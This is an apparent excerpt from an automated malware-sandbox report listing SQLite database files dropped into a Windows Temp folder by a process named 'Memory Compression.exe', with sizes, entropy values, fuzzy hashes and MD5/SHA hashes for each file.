                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\cCbLMFoHlO

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\cOiWB6ox3x

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\cvoKNxc2ha

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dBzGphza8U

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dMlU6MOAxP

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dQ2OZXYRfA

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dS01rCZlIE

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\daywmlu82G

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dkpz0jEDd8

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dlF4GRZ9GE

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dmxy832xUa

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\e0RxyauKnL

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\eKcTPbo6mk

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\eKyJrr5F9K

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\fQmdBEQasM

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\fTsrt5ghVe

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\fUs1TGVwBD

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\fqe3kPZZmn

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\fvvXX7TZfM

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\g0iQl2sATM

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\g871TE7FUd

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\gEE655Q3vl

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
